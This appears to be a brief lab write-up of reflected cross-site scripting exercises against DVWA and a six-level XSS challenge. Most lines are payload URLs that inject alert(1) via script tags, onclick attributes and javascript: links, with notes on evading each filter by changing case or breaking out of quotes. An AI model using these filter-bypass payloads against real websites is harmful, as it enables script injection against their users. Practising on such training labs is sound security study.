0x01 dvwa xss(reflected)
1.1 Security Level: low
use the typical <script>alert(1)</script> to pop up:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>
1.2 Security Level: medium
test as above, not work:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>
change url as below, bingo:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<Script>alert(1)</script>
alternative way:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<a onclick="alert(1)">click me</a>
1.3 Security Level: high
test , bingo:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<a onclick="alert(1)">click me</a>
0x02 xss challenge
2.1 level 1
payload: http://n00p.me/xss/level1.php?name=<script>alert(1)</script>
2.2 level 2
test typical, and notice this line in source code:
<input name=keyword value="<script>alert(1)</script>">try to enclose the double quota , and this is payload:
n00p.me/xss/level2.php?keyword=a" onclick=alert(1) id=" &submit=搜索
2.3 level 3
same as level 2 except double quota to single quota
n00p.me/xss/level3.php?keyword=a' onclick=alert(1) id=' &submit=搜索
2.4 level 4
same as level 2
2.5 level 5
view the source code, notice that the script has been alted
<input name=keyword value="<scr_ipt>alert(1)</script>">change path, as below:
http://n00p.me/xss/level5.php?keyword= a"><a href=javascript:alert(1)>bbb</a> <" &submit
2.6 level 6
view the source code, notice that the href has been alted
<input name=keyword value=" a"><a hr_ef=javascript:alert(1)>bbb</a> <" ">turn href to Capital Letters , like hRef
n00p.me/xss/level6.php?keyword= a"><a hRef=javascript:alert(1)>bbb</a> <" &submit
